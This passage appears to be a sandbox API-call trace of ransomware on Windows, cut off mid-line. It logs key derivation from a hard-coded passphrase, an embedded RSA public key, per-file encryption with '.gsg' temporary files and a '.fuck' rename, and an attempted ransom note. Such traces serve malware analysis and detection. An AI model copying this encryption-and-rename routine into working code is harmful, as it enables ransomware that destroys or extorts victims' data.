phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.256] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.256] CryptHashData (hHash=0x28e84f8, pbData=0x27e2330, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.256] CryptDeriveKey (in: hProv=0x28f6920, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8578) returned 1 [0240.256] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.256] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.256] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f6e70) returned 1 [0240.256] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6e70, dwCertEncodingType=0x1, pInfo=0x28c7c68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7c98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7ca0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e85b8) returned 1 [0240.256] CryptEncrypt (in: hKey=0x28e85b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.257] CryptEncrypt (in: hKey=0x28e85b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6700*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f6700*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.257] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6700, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.257] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.257] CryptEncrypt (in: hKey=0x28e8578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.257] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.257] CloseHandle (hObject=0xffffffff) returned 1 [0240.257] CloseHandle (hObject=0xffffffff) returned 1 [0240.257] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.257] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.258] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg")) returned 0 [0240.258] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.fuck")) returned 0 [0240.258] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0240.258] CryptDestroyKey (hKey=0x28e8578) returned 1 [0240.258] CryptReleaseContext (hProv=0x28f6920, dwFlags=0x0) returned 1 [0240.258] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.258] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.259] GetLastError () returned 0x5 [0240.259] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml")) returned 0x20 [0240.259] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.259] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.259] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.260] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.260] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6ef8) returned 1 [0240.262] CryptCreateHash (in: hProv=0x28f6ef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.262] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.262] CryptHashData (hHash=0x28e89b8, pbData=0x2857330, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.262] CryptDeriveKey (in: hProv=0x28f6ef8, Algid=0x6610, hBaseData=0x28e89b8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e89f8) returned 1 [0240.262] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.262] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.262] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f6920) returned 1 [0240.263] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6920, dwCertEncodingType=0x1, pInfo=0x28c7928*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7958*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7960*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e8438) returned 1 [0240.263] CryptEncrypt (in: hKey=0x28e8438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.263] CryptEncrypt (in: hKey=0x28e8438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6de8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f6de8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.263] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6de8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.263] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.263] CryptEncrypt (in: hKey=0x28e89f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.263] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.263] CloseHandle (hObject=0xffffffff) returned 1 [0240.263] CloseHandle (hObject=0xffffffff) returned 1 [0240.263] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.264] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.264] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.gsg")) returned 0 [0240.264] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.fuck")) returned 0 [0240.265] CryptDestroyHash (hHash=0x28e89b8) returned 1 [0240.265] CryptDestroyKey (hKey=0x28e89f8) returned 1 [0240.265] CryptReleaseContext (hProv=0x28f6ef8, dwFlags=0x0) returned 1 [0240.265] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.265] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e86f8 [0240.265] FindNextFileA (in: hFindFile=0x28e86f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.265] FindNextFileA (in: hFindFile=0x28e86f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.265] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e84f8 [0240.265] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.265] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.265] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.265] GetLastError () returned 0x5 [0240.265] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.266] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.266] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.266] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.267] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.267] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6788) returned 1 [0240.269] CryptCreateHash (in: hProv=0x28f6788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.269] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.269] CryptHashData (hHash=0x28e8638, pbData=0x2856db8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.269] CryptDeriveKey (in: hProv=0x28f6788, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e89f8) returned 1 [0240.269] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.269] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.269] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f6bc8) returned 1 [0240.270] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6bc8, dwCertEncodingType=0x1, pInfo=0x28c8488*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c84b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c84c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e89b8) returned 1 [0240.270] CryptEncrypt (in: hKey=0x28e89b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.270] CryptEncrypt (in: hKey=0x28e89b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f64e0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f64e0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.270] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f64e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.270] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.270] CryptEncrypt (in: hKey=0x28e89f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.270] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.270] CloseHandle (hObject=0xffffffff) returned 1 [0240.270] CloseHandle (hObject=0xffffffff) returned 1 [0240.270] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.271] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.271] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.271] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.272] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.272] CryptDestroyKey (hKey=0x28e89f8) returned 1 [0240.272] CryptReleaseContext (hProv=0x28f6788, dwFlags=0x0) returned 1 [0240.272] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.272] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.272] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.272] AreFileApisANSI () returned 1 [0240.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6ab8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.272] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.273] GetLastError () returned 0x5 [0240.273] GetLastError () returned 0x5 [0240.273] FindNextFileA (in: hFindFile=0x28e86f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.273] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.273] GetLastError () returned 0x5 [0240.273] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml")) returned 0x20 [0240.273] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.273] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.274] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.274] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.274] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6ef8) returned 1 [0240.277] CryptCreateHash (in: hProv=0x28f6ef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.277] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.277] CryptHashData (hHash=0x28e86b8, pbData=0x2857178, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.277] CryptDeriveKey (in: hProv=0x28f6ef8, Algid=0x6610, hBaseData=0x28e86b8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e84f8) returned 1 [0240.277] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 